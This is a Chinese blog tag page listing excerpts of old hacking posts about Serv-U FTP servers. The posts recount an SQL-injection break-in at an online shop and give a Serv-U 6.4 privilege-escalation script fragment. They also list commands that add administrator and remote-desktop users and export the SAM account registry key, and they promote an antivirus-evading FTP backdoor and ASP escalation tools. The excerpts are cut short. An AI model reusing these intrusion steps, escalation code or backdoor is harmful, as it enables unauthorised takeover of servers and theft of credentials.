标签 ‘Serv-U’ 下的日志

利用serv-u拿下网上商城

文章作者:rabbitsafe
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章已经发表于2006年第8期《黑客手册》,后由原创作者友情提交到邪恶八进制论坛,转载请著名原始出处《黑客手册》。

今天,渗透的是一家性用品商城,网站用的全是php程序,对于php构建的系统,一般后台数据库都是mysql,就像asp对应着mssql和一样,由于 php的特性(php默认将传递参数中的“‘”等字符做了转换,所以对于字符类型的变量默认情况下很难注入),一般情况下我们注入的只能是数字类型的变量,根据平时注入的知识,我们知道id=xxx的连接就有可能找到漏洞!

一、寻找注入点
首先,在主站上转悠了一圈,主站中的数字类型变量不存在注入漏洞,提交http://www.XXX.com/view.php?id=1250 阅读全文 »

Tags:

SERV-U 6.4提权方法,通杀SERV-U版本

来源:NetKnave's BLog

修改ftpport为21

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)…OK…..提权…会用FTP增加一个可以

执行命令的用户…..有个这个用户什么不能做哈…..
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
阅读全文 »

Tags: ,

巧用SU添加管理帐号

来源:b0r3d's Blog

今天朋友扔来一webshell让提权,SU默认密码没改,可执行命令,添加管理员后登陆,出现没有权限

估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add

朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

然后修改administrator密码登陆,晕,竟然给禁用了,

net user administrator /active:yes 启用管理员帐号登陆

还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限

阅读全文 »

Tags:

SUS迷你ftp后门

文章作者:单克隆抗体
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发东南大学网络安全联盟论坛(www.bestseu.com/sus/),后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。

这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?

这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。
阅读全文 »

Tags:

ServuSu.asp提权利用程序[Goldsun版]

ps:前几天发过lake2版的, Serv-U本地权限提升的ASP实现+程序 ,现在发一个Goldsun版的,比lake的那个多了点功能。

作者: Goldsun
-=火狐技术联盟 0day·中国=-

参照exe,php,aspx版写的一个servuSU程序,
利用microsoft.xmlhttp组件来网络交互实现。

本来打算2006年8月15日发布的,可最近私事繁忙,所以提前发布。
注意:
如果加不了用户,有可能系统的net.exe等命令
被权限隔离或删除,命令可以根据需要自己写,

阅读全文 »

Tags: ,

Serv-U本地权限提升的ASP实现+程序

Author:lake2 ( http://lake2.0x54.org )

最近的生活真无聊,寒冰掌老大见我无所事事,就说如果我能把Serv-U本地提权的ASP程序做出来就给介绍个MM,所以呢,就有了这篇文章^_^
Serv-U本地提权的问题很古老了,不清楚的朋友谷歌一下先,我就不罗嗦啦。呵呵,最主要的是相继出现了php、perl、aspx版本的提权脚本,一时间刀光剑影满天飞,惟独缺了ASP版的。主要是由于郁闷的ASP不能像其他脚本那样访问Socket(另一个原因是因为老大没早点对我用美眉计^_^)。
网上流传可以利用MSWinsock控件实现,这是不好滴。因为这是个第三方组件,呵呵,几率相当小,既然要杀人灭口,嘿嘿,肯定要采用一套通杀的方法才是。
Serv-U服务器管理那里使用了FTP协议,所以我们应该研究一下FTP协议先。

正常的FTP协议的认证过程:
阅读全文 »

Tags: ,